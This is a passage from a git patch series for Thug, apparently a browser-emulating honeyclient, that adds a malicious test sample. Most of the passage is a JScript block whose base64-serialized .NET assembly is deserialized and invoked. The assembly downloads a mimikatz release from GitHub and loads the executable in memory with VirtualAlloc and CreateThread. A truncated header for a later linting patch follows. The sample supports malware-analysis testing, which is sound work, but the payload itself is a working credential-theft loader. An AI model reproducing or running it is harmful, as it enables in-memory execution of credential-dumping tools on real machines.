+		"KAwAAAZ7jgAABF8G/gELKwAHKhMwAQAMAAAACQAAEQACewcAAAQKKwAGKhMwAQAMAAAACgAAEQAC"+
+		"ewgAAAQKKwAGKhMwAQAMAAAACwAAEQACewkAAAQKKwAGKhMwAQAMAAAADAAAEQACewoAAAQKKwAG"+
+		"KhMwAQAMAAAADQAAEQACewsAAAQKKwAGKhMwAQARAAAADgAAEQACe48AAARzPAAACgorAAYqiiAA"+
+		"EAAAgJ0AAAQgACAAAICeAAAEH0CAnwAABBqAoAAABCoeAigNAAAKKkJTSkIBAAEAAAAAAAwAAAB2"+
+		"NC4wLjMwMzE5AAAAAAUAbAAAAJQLAAAjfgAAAAwAAMgOAAAjU3RyaW5ncwAAAADIGgAAFAEAACNV"+
+		"UwDcGwAAEAAAACNHVUlEAAAA7BsAAKADAAAjQmxvYgAAAAAAAAACAAABV/2jHQkOAAAA+iUzABYA"+
+		"AAEAAAAsAAAADgAAAKcAAAAYAAAAHQAAAD4AAAAFAAAABAAAAAEAAAABAAAAAwAAAAoAAAAOAAAA"+
+		"AgAAAAcAAAAHAAAAAgAAAAMAAAAHAAAAAQAAAAMAAAAKAAAAAQAAAAUAAAAAAAoAAQAAAAAABgAJ"+
+		"AQIBBgAQAQIBBgAaAQIBBgCiAZgBBgAPApgBBgANCvEJBgApCvEJBgBYCjgKBgB4CjgKBgCfCgIB"+
+		"BgDNCq4KBgAJC+0KBgAYC5gBBgAjC5gBBgA6Cy4LBgBPC5gBBgBqCwIBBgByC5gBBgCECwIBBgCJ"+
+		"C5gBBgCpCwIBCgDIC70LDgD1C98LBgAfDAAMDgA0DN8LBgBrDFAMBgCgDAIBBgDUDMEMBgDpDAIB"+
+		"BgALDa4KBgAgDQIBBgAlDQIBBgCzDZgBBgC8DZgBBgDXDZgBBgDzDa4KBgD8Da4KBgAnDq4KBgA9"+
+		"Dq4KBgBIDq4KBgBdDq4KBgBwDq4KBgB+DgIBBgCtDp0OAAAAAAEAAAAAAAEAAQABABAAFwAAAAUA"+
+		"AQABAAEAEAAhAAAABQAGAAgACgEQACoAAAAJAAwAEQAKARAAOwAAAAkAKwARAAoBEABQAAAACQAt"+
+		"ABEACgEQAGgAAAAJAFsAEQAKARAAgAAAAAkAiAARABIBEACSAAAACQCPABEACgEQAKcAAAAJAJkA"+
+		"EgACAQAAvQAAAA0AmwASAAAAEADOAAAABQCdABIACgEQAKcAAAAJAKEAGQAKARAA4QAAAAkAowAZ"+
+		"AFGAHwEKAFGALAESAFGAOgESAFGASwESABYAYwEqAAEAuwFQAAEAxQFUAAEA0AFYAAEA4QFcAAEA"+
+		"8gFgAAEABgJlAAYA9wK4AAYA/wK4AAYABgO4AAYACwO4AAYAEgO4AAYAHAO4AAYAJwO4AAYAMgO4"+
+		"AAYANwO4AAYAPAO4AAYAQwO4AAYASAO4AAYATQO4AAYAVgO4AAYAXQO4AAYAZQO4AAYAbQO4AAYA"+
+		"dQO4AAYAfQO4AAYAhQO4AAYAjwO4AAYAmAO4AAYAoQO4AAYAqgO4AAYAswO4AAYAvAO4AAYAxQO4"+
+		"AAYAzgO4AAYA1wO4AAYA4AO4AAYA6QMSAAYA8gMSAAYAAQQSAAYABgS4AAYADAS7AAYAHwS7AAYA"+
+		"MgQSAAYAPQQSAAYAUwQSAAYAawQSAAYAfwQSAAYAigQSAAYAlQQSAAYAnwQSAAYAsAQSAAYAvgS4"+
+		"AAYA2gS4AAYA9gS4AAYACAW4AAYAGgW4AAYAMAW4AAYARgUSAAYAWAUSAAYAZAUSAAYAcgUSAAYA"+
+		"ewW4AAYAhQW4AAYAmAUSAAYAqwUSAAYAvQUSAAYAzwUSAAYA4AUSAAYA7AUSAAYAAAa+AAYADAa+"+
+		"AAYAGAa+AAYAJga+AAYANQa+AAYARga+AAYAWga+AAYAYAa+AAYAbQa+AAYAdwa+AAYAgAa+AAYA"+
+		"kAa+AAYAnAa+AAYAoAa+AAYAtga+AAYAxwa+AAYABgS4AAYADAS7AAYAHwS7AAYAMgQSAAYAPQQS"+
+		"AAYAUwQSAAYAawQSAAYAfwQSAAYAlQTCAAYAnwQSAAYAsAQSAAYAvgS4AAYA2gS4AAYA9gS4AAYA"+
+		"CAW4AAYAGgW4AAYAMAW4AAYARgUSAAYAWAUSAAYAZAUSAAYAcgUSAAYAewW4AAYAhQW4AAYAmAXC"+
+		"AAYAqwXCAAYAvQXCAAYAzwXCAAYA4AUSAAYA7AUSAAYAAAa+AAYADAa+AAYAGAa+AAYAJga+AAYA"+
+		"NQa+AAYARga+AAYAWga+AAYAYAa+AAYAbQa+AAYAdwa+AAYAgAa+AAYAkAa+AAYAnAa+AAYAoAa+"+
+		"AAYAtga+AAYAxwa+AAYA0Aa4AAYA2Aa4AAYA6QYSAAYA9wYSAAYADAcSAAYAHAe4AAYAMQe4AAYQ"+
+		"QQfFAAYARgcSAAYA8gMSAAYAUgcSAAYAYAcSAAYAcQcSAAYAhgcSAAYAmwe4AAYArwe4AAYAMQfJ"+
+		"AAYA1wcSAAYA5QcSAAYG8QcSAFaA+QfJABYA/gcSABYACQgSABYAFQgSABYALAgSAAYA1wcSAAYA"+
+		"5QcSAAYAhAgSAAYA6QYSAAYAlwgSAAYAQQcSAAYApggSAFAgAAAAAJYAWQEkAAEAAAAAAIAAkSBs"+
+		"AS0AAwAAAAAAgACRIHkBMQADAHggAAAAAJYAhAE8AAoA1iAAAAAAhhiSAUAACgD0IAAAAACWAKkB"+
+		"RAAKAGghAAAAAJYAswFLAAsAfCkAAAAAhhiSAWkADACAKgAAAACGGJIBbgANAIArAAAAAJYAHAJ0"+
+		"AA4A2CsAAAAAhggvAnwADwAALAAAAACGCEECgAAPABgsAAAAAIYIUAKFAA8AMCwAAAAAhghlAooA"+
+		"DwBILAAAAACGCHoCjwAPAGAsAAAAAIYIkgKVAA8AeCwAAAAAhgjDB80ADwAAAAAAgACWIDsI2gAP"+
+		"AAAAAACAAJYgSAjiABMAAAAAAIAAliBUCOcAFAAAAAAAgACWIGMI7QAWAAAAAACAAJYgcAj3ABwA"+
+		"uCwAAAAAhhiSAUAAHgCVLAAAAACRGJYOPAAeAAAAAQCxCAAAAgCzCAAAAQC1CAAAAgDACAAAAwDQ"+
+		"CAAABADcCAAABQDxCAAABgAHCQAABwAcCQAAAQAqCQAAAQAwCQAAAQA0CQAAAQA9CQAAAQBHCQAA"+
+		"AQBOCQAAAgBaCQAAAwBfCQAABABwCQAAAQC1CAAAAQB6CQAAAgCCCQAAAQCLCQAAAgCeCQAAAwCq"+
+		"CQAABAC5CQAABQC/CQAABgDPCQAAAQDaCQAAAgDiCTEAkgH9AEEAkgEDAUkAkgFAAFEApgoIAVEA"+
+		"kgEMAVkAkgFpAGEAkgEWAWkAkgEcAXkAQwskAYEAkgEqAYEAXAsyAYkAfQs3AQkAkgFAAKEAkgFA"+
+		"ACEAlgtJASEAnAtRAaEAoQuVAKkAtQtAALEAkgFAALEA0gtkAaEAkgFuALkAkgFqAbkARAxwAQwA"+
+		"eQyAARQAhwyQAckAkwzNANkApwyVAVEAswwtAMkAvAybAeEA4Ax8AOkA8wygAVEABg0qAPEAEw2l"+
+		"AVEAGA2uAfkANw2yAfEASQ26AfEAWA3BAfEAXw3HAfEAaQ3NAfEAcw3SAfEAfg3YAfEAiA3dAfEA"+
+		"kw3jAVEAow3NAVEArw0kAFEAow3YAWkAkgErAikAkgFqASEAxw06AikAzA1CAhkB3A1aAqEAkgFJ"+
+		"ASkA6Q13AiEBCQ59AiEBDw6HAiEBIg5AADEBkgG2AkEBkgEDAUkBkgG9AtkAkgHHAlkBkgFAAGEB"+
+		"kgFAAAgABAANAAkACAAVAAkADAAaAAkAEAAfAAkAcALVACcA8wHRAi4AEwDWAi4AGwDfAmMB6wHR"+
+		"Ah4BxAIIAAYA/gIBAAAAAAAGAAEAAAAAAAcAAQAAAAAACAAAAAAAjwAIAAAAkAAMAAAAkQAQAAAA"+
+		"kgAUAAAAkwAYAAAAlAAcAAAAlQAgAAAAlgAiAAAAlwAkAAAAmAARAT0BWQHoAWACagKLApcCnAKh"+
+		"AqYCqwKxAs0CAwABAAkABwAAAJ8CmgAAAK0CngAAALgCowAAAMkCqAAAANoCrQAAAO4CswAAAM8H"+
+		"0QACAAsAAwACAAwABQACAA0ABwACAA4ACQACAA8ACwACABAADQACABEADwDgCo0OeQGJAXQCRgMF"+
+		"AGwBAQBAAQcAeQEBAAABJQA7CAIARAEnAEgIAQBDASkAVAgBAAABKwBjCAIAAAEtAHAIAgAEgAAA"+
+		"AAAAAAAAAAAAAAAAAACWCgAABAAAAAAAAAAAAAAAAQD5AAAAAAAEAAAAAAAAAAAAAAABAAIBAAAA"+
+		"AAQAAAAAAAAAAAAAAAEA3wsAAAAABAADAAUAAwAGAAMABwADAAgAAwAJAAMACgADAAsAAwANAAwA"+
+		"DgAMAAAAAAAVAC0CFAA1AhQARgIUAEsCFABQAhQAVQIAAAA8TW9kdWxlPgBuZXRrYXR6My5kbGwA"+
+		"VGVzdENsYXNzAFBFTG9hZGVyAElNQUdFX0RPU19IRUFERVIASU1BR0VfREFUQV9ESVJFQ1RPUlkA"+
+		"SU1BR0VfT1BUSU9OQUxfSEVBREVSMzIASU1BR0VfT1BUSU9OQUxfSEVBREVSNjQASU1BR0VfRklM"+
+		"RV9IRUFERVIASU1BR0VfU0VDVElPTl9IRUFERVIASU1BR0VfQkFTRV9SRUxPQ0FUSU9OAERhdGFT"+
+		"ZWN0aW9uRmxhZ3MATmF0aXZlRGVjbGFyYXRpb25zAElNQUdFX0lNUE9SVF9ERVNDUklQVE9SAG1z"+
+		"Y29ybGliAFN5c3RlbQBPYmplY3QAVmFsdWVUeXBlAEVudW0ATVlfQ09ERV9QQUdFAEdFTkVSSUNf"+
+		"V1JJVEUARklMRV9TSEFSRV9XUklURQBPUEVOX0VYSVNUSU5HAEludFB0ckFkZABjb2RlYmFzZQBB"+
+		"bGxvY0NvbnNvbGUAQ3JlYXRlRmlsZQBDcmVhdGVDb25zb2xlAC5jdG9yAFN5c3RlbS5JTwBTdHJl"+
+		"YW0AUmVhZEZ1bGx5AEV4ZWN1dGUAZG9zSGVhZGVyAGZpbGVIZWFkZXIAb3B0aW9uYWxIZWFkZXIz"+
+		"MgBvcHRpb25hbEhlYWRlcjY0AGltYWdlU2VjdGlvbkhlYWRlcnMAcmF3Ynl0ZXMAQmluYXJ5UmVh"+
+		"ZGVyAEZyb21CaW5hcnlSZWFkZXIAVABnZXRfSXMzMkJpdEhlYWRlcgBnZXRfRmlsZUhlYWRlcgBn"+
+		"ZXRfT3B0aW9uYWxIZWFkZXIzMgBnZXRfT3B0aW9uYWxIZWFkZXI2NABnZXRfSW1hZ2VTZWN0aW9u"+
+		"SGVhZGVycwBnZXRfUmF3Qnl0ZXMASXMzMkJpdEhlYWRlcgBGaWxlSGVhZGVyAE9wdGlvbmFsSGVh"+
+		"ZGVyMzIAT3B0aW9uYWxIZWFkZXI2NABJbWFnZVNlY3Rpb25IZWFkZXJzAFJhd0J5dGVzAGVfbWFn"+
+		"aWMAZV9jYmxwAGVfY3AAZV9jcmxjAGVfY3BhcmhkcgBlX21pbmFsbG9jAGVfbWF4YWxsb2MAZV9z"+
+		"cwBlX3NwAGVfY3N1bQBlX2lwAGVfY3MAZV9sZmFybGMAZV9vdm5vAGVfcmVzXzAAZV9yZXNfMQBl"+
+		"X3Jlc18yAGVfcmVzXzMAZV9vZW1pZABlX29lbWluZm8AZV9yZXMyXzAAZV9yZXMyXzEAZV9yZXMy"+
+		"XzIAZV9yZXMyXzMAZV9yZXMyXzQAZV9yZXMyXzUAZV9yZXMyXzYAZV9yZXMyXzcAZV9yZXMyXzgA"+
+		"ZV9yZXMyXzkAZV9sZmFuZXcAVmlydHVhbEFkZHJlc3MAU2l6ZQBNYWdpYwBNYWpvckxpbmtlclZl"+
+		"cnNpb24ATWlub3JMaW5rZXJWZXJzaW9uAFNpemVPZkNvZGUAU2l6ZU9mSW5pdGlhbGl6ZWREYXRh"+
+		"AFNpemVPZlVuaW5pdGlhbGl6ZWREYXRhAEFkZHJlc3NPZkVudHJ5UG9pbnQAQmFzZU9mQ29kZQBC"+
+		"YXNlT2ZEYXRhAEltYWdlQmFzZQBTZWN0aW9uQWxpZ25tZW50AEZpbGVBbGlnbm1lbnQATWFqb3JP"+
+		"cGVyYXRpbmdTeXN0ZW1WZXJzaW9uAE1pbm9yT3BlcmF0aW5nU3lzdGVtVmVyc2lvbgBNYWpvcklt"+
+		"YWdlVmVyc2lvbgBNaW5vckltYWdlVmVyc2lvbgBNYWpvclN1YnN5c3RlbVZlcnNpb24ATWlub3JT"+
+		"dWJzeXN0ZW1WZXJzaW9uAFdpbjMyVmVyc2lvblZhbHVlAFNpemVPZkltYWdlAFNpemVPZkhlYWRl"+
+		"cnMAQ2hlY2tTdW0AU3Vic3lzdGVtAERsbENoYXJhY3RlcmlzdGljcwBTaXplT2ZTdGFja1Jlc2Vy"+
+		"dmUAU2l6ZU9mU3RhY2tDb21taXQAU2l6ZU9mSGVhcFJlc2VydmUAU2l6ZU9mSGVhcENvbW1pdABM"+
+		"b2FkZXJGbGFncwBOdW1iZXJPZlJ2YUFuZFNpemVzAEV4cG9ydFRhYmxlAEltcG9ydFRhYmxlAFJl"+
+		"c291cmNlVGFibGUARXhjZXB0aW9uVGFibGUAQ2VydGlmaWNhdGVUYWJsZQBCYXNlUmVsb2NhdGlv"+
+		"blRhYmxlAERlYnVnAEFyY2hpdGVjdHVyZQBHbG9iYWxQdHIAVExTVGFibGUATG9hZENvbmZpZ1Rh"+
+		"YmxlAEJvdW5kSW1wb3J0AElBVABEZWxheUltcG9ydERlc2NyaXB0b3IAQ0xSUnVudGltZUhlYWRl"+
+		"cgBSZXNlcnZlZABNYWNoaW5lAE51bWJlck9mU2VjdGlvbnMAVGltZURhdGVTdGFtcABQb2ludGVy"+
+		"VG9TeW1ib2xUYWJsZQBOdW1iZXJPZlN5bWJvbHMAU2l6ZU9mT3B0aW9uYWxIZWFkZXIAQ2hhcmFj"+
+		"dGVyaXN0aWNzAE5hbWUAVmlydHVhbFNpemUAU2l6ZU9mUmF3RGF0YQBQb2ludGVyVG9SYXdEYXRh"+
+		"AFBvaW50ZXJUb1JlbG9jYXRpb25zAFBvaW50ZXJUb0xpbmVudW1iZXJzAE51bWJlck9mUmVsb2Nh"+
+		"dGlvbnMATnVtYmVyT2ZMaW5lbnVtYmVycwBnZXRfU2VjdGlvbgBTZWN0aW9uAFZpcnR1YWxBZHJl"+
+		"c3MAU2l6ZU9mQmxvY2sAdmFsdWVfXwBTdHViAE1FTV9DT01NSVQATUVNX1JFU0VSVkUAUEFHRV9F"+
+		"WEVDVVRFX1JFQURXUklURQBQQUdFX1JFQURXUklURQBWaXJ0dWFsQWxsb2MATG9hZExpYnJhcnkA"+
+		"R2V0UHJvY0FkZHJlc3MAQ3JlYXRlVGhyZWFkAFdhaXRGb3JTaW5nbGVPYmplY3QAT3JpZ2luYWxG"+
+		"aXJzdFRodW5rAEZvcndhcmRlckNoYWluAEZpcnN0VGh1bmsAYQBiAGxwRmlsZU5hbWUAZHdEZXNp"+
+		"cmVkQWNjZXNzAGR3U2hhcmVNb2RlAGxwU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25EaXNw"+
+		"b3NpdGlvbgBkd0ZsYWdzQW5kQXR0cmlidXRlcwBoVGVtcGxhdGVGaWxlAGlucHV0AHVybABmaWxl"+
+		"UGF0aABmaWxlQnl0ZXMAcmVhZGVyAGxwU3RhcnRBZGRyAHNpemUAZmxBbGxvY2F0aW9uVHlwZQBm"+
+		"bFByb3RlY3QAaE1vZHVsZQBwcm9jTmFtZQBscFRocmVhZEF0dHJpYnV0ZXMAZHdTdGFja1NpemUA"+
+		"bHBTdGFydEFkZHJlc3MAcGFyYW0AZHdDcmVhdGlvbkZsYWdzAGxwVGhyZWFkSWQAaEhhbmRsZQBk"+
+		"d01pbGxpc2Vjb25kcwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAU2VjdXJpdHlQZXJtaXNz"+
+		"aW9uQXR0cmlidXRlAFNlY3VyaXR5QWN0aW9uAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2Vydmlj"+
+		"ZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0"+
+		"dHJpYnV0ZQBuZXRrYXR6MwBJbnRQdHIAVG9JbnQ2NABTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2Vy"+
+		"dmljZXMARGxsSW1wb3J0QXR0cmlidXRlAGtlcm5lbDMyLmRsbABNaWNyb3NvZnQuV2luMzIuU2Fm"+
+		"ZUhhbmRsZXMAU2FmZUZpbGVIYW5kbGUARmlsZVN0cmVhbQBGaWxlQWNjZXNzAFN5c3RlbS5UZXh0"+
+		"AEVuY29kaW5nAEdldEVuY29kaW5nAFN0cmVhbVdyaXRlcgBzZXRfQXV0b0ZsdXNoAENvbnNvbGUA"+
+		"VGV4dFdyaXRlcgBTZXRPdXQAQnl0ZQBNZW1vcnlTdHJlYW0AV3JpdGUAUmVhZABUb0FycmF5AElE"+
+		"aXNwb3NhYmxlAERpc3Bvc2UAU3lzdGVtLk5ldABXZWJDbGllbnQARG93bmxvYWREYXRhAFN5c3Rl"+
+		"bS5JTy5Db21wcmVzc2lvbgBaaXBBcmNoaXZlAFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2Rl"+
+		"bABSZWFkT25seUNvbGxlY3Rpb25gMQBaaXBBcmNoaXZlRW50cnkAZ2V0X0VudHJpZXMAU3lzdGVt"+
+		"LkNvbGxlY3Rpb25zLkdlbmVyaWMASUVudW1lcmF0b3JgMQBHZXRFbnVtZXJhdG9yAGdldF9DdXJy"+
+		"ZW50AGdldF9GdWxsTmFtZQBTdHJpbmcAb3BfRXF1YWxpdHkAZ2V0X1NpemUAT3BlbgBTeXN0ZW0u"+
+		"Q29sbGVjdGlvbnMASUVudW1lcmF0b3IATW92ZU5leHQARXhjZXB0aW9uAGdldF9Jbm5lckV4Y2Vw"+
+		"dGlvbgBaZXJvAE1hcnNoYWwAQ29weQBUb0ludDMyAFR5cGUAUnVudGltZVR5cGVIYW5kbGUAR2V0"+
+		"VHlwZUZyb21IYW5kbGUAUHRyVG9TdHJ1Y3R1cmUAU2l6ZU9mAFJlYWRJbnQxNgBSZWFkSW50MzIA"+
+		"V3JpdGVJbnQzMgBSZWFkSW50NjQAV3JpdGVJbnQ2NABQdHJUb1N0cmluZ0Fuc2kAb3BfRXhwbGlj"+
+		"aXQAQWRkAEZpbGVNb2RlAFNlZWtPcmlnaW4AU2VlawBSZWFkVUludDMyAEZpbGUAUmVhZEFsbEJ5"+
+		"dGVzAFJlYWRCeXRlcwBHQ0hhbmRsZQBHQ0hhbmRsZVR5cGUAQWxsb2MAQWRkck9mUGlubmVkT2Jq"+
+		"ZWN0AEZyZWUAU3RydWN0TGF5b3V0QXR0cmlidXRlAExheW91dEtpbmQARmllbGRPZmZzZXRBdHRy"+
+		"aWJ1dGUATWFyc2hhbEFzQXR0cmlidXRlAFVubWFuYWdlZFR5cGUARmxhZ3NBdHRyaWJ1dGUAa2Vy"+
+		"bmVsMzIALmNjdG9yAFN5c3RlbS5TZWN1cml0eQBVbnZlcmlmaWFibGVDb2RlQXR0cmlidXRlAAAA"+
+		"D0MATwBOAE8AVQBUACQAAIC1aAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBn"+
+		"AGUAbgB0AGkAbABrAGkAdwBpAC8AbQBpAG0AaQBrAGEAdAB6AC8AcgBlAGwAZQBhAHMAZQBzAC8A"+
+		"ZABvAHcAbgBsAG8AYQBkAC8AMgAuADEALgAxAC0AMgAwADEANwAxADIAMgAwAC8AbQBpAG0AaQBr"+
+		"AGEAdAB6AF8AdAByAHUAbgBrAC4AegBpAHAAASF4ADYANAAvAG0AaQBtAGkAawBhAHQAegAuAGUA"+
+		"eABlAAAlVwBpAG4AMwAyAC8AbQBpAG0AaQBrAGEAdAB6AC4AZQB4AGUAAAEAAACHWWlLXF4cQYJP"+
+		"ySMsgyENAAi3elxWGTTgiQIGCAS1AQAAAgYJBAAAAEAEAgAAAAQDAAAABQACGBgIAgYYAwAACAoA"+
+		"BxgOCQkJCQkJAwAAAQMgAAEGAAEdBRIRBAABAQ4DBhEQAwYRIAMGERgDBhEcBAYdESQDBh0FBCAB"+
+		"AQ4FIAEBHQUHEAEBHgASFQMgAAIEIAARIAQgABEYBCAAERwFIAAdESQEIAAdBQMoAAIEKAARIAQo"+
+		"ABEYBCgAERwFKAAdESQEKAAdBQIGBwIGBQMGERQCBgsDBh0DAwYRLAMgAA4DKAAOBAAAAAAHAAQY"+
+		"GAkJCQQAARgOBQACGBgOCQAGGBgJGBgJGAUAAgkYCQUgAQERHQQgAQEIAyAACgQgAQEKBAcCGBgF"+
+		"IAIBGAIHIAIBEjEROQUAARI9CAcgAgESERI9BCABAQIFAAEBEkkLBwUYEjESNRI9EkEHIAMBHQUI"+
+		"CAcgAwgdBQgICgcFHQUSUQgdBQIFIAEdBQ4FIAEBEhEIIAAVEmEBEmUGFRJhARJlCCAAFRJpARMA"+
+		"BhUSaQESZQQgABMABQACAg4OBCAAEhEEIAASdQgABAEdBQgYCAMgAAgHAAESfRGAgQYAAhwYEn0F"+
+		"AAEIEn0FAAIGGAgEAAEIGAUAAgEYCAQAAQoYBQACARgKBAABDhhCBzASWR0FHQUSERIREl0SZRJ1"+
+		"EgwIGBgKGBE0CBgIGBE0GBgYBwcHCAoYGAgYCQgYCBgYDhgIGA4YGBUSaQESZQIHCSADAQ4RgIUR"+
+		"OQQKAREQByACCgoRgIkDIAAJBAoBESAECgERGAQKAREcBAoBESQFAAEdBQ4JBwUSNRIVCQgCCQcF"+
+		"ElESFQkIAgIeAAUgAR0FCAkAAhGAkRwRgJUDIAAYCwcEHQURgJEeAB4ABAcCBwIEBwERIAQHAREY"+
+		"BAcBERwFBwEdESQEBwEdBQYgAQERgJ0GIAEBEYCpAh4IBSABAR0DAwcBDgQBAAAACAEACAAAAAAA"+
+		"HgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAYCeLgGAhFN5c3RlbS5TZWN1cml0eS5QZXJt"+
+		"aXNzaW9ucy5TZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUsIG1zY29ybGliLCBWZXJzaW9uPTQu"+
+		"MC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORUB"+
+		"VAIQU2tpcFZlcmlmaWNhdGlvbgEAAHRMAAAAAAAAAAAAAI5MAAAAIAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAACATAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAA"+
+		"AAAAAAAAAAEAAAAAAEgAAABYYAAATAIAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8A"+
+		"TgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAIAAAAA"+
+		"AAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4A"+
+		"cwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAA"+
+		"AIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkA"+
+		"bwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAuADAALgAw"+
+		"AAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABuAGUAdABrAGEAdAB6ADMALgBkAGwA"+
+		"bAAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADQABAE8AcgBp"+
+		"AGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABuAGUAdABrAGEAdAB6ADMALgBkAGwAbAAAAAAA"+
+		"NAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAAB"+
+		"AEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AEAAAAwAAACgPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
+		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB"+
+		"DQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBM"+
+		"b2FkKEJ5dGVbXSkIAAAACgsA";
+		var entry_class = 'TestClass';
+
+		try {
+			// setversion();
+			var stm = base64ToStream(serialized_obj);
+			var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
+			var al = new ActiveXObject('System.Collections.ArrayList');
+			var d = fmt.Deserialize_2(stm);
+			al.Add(undefined);
+			var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
+			
+		} catch (e) {
+			debug(e.message);
+		}
+	}
+
+Exec();
+</script>

From 8abdc5e2b927d498b87440fd7e0f677782b5bc05 Mon Sep 17 00:00:00 2001
From: Angelo Dell'Aera <buffer@olografix.org>
Date: Tue, 12 Mar 2024 08:20:06 +0100
Subject: [PATCH 09/12] Minor linting change

---
 .../Serialization/Formatters/Binary/BinaryFormatter.py        | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py b/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
index 411bcee3ab..ec82b141ad 100644
--- a/thug/ActiveX/modules/System/Runtime/Serialization/Formatters/Binary/BinaryFormatter.py
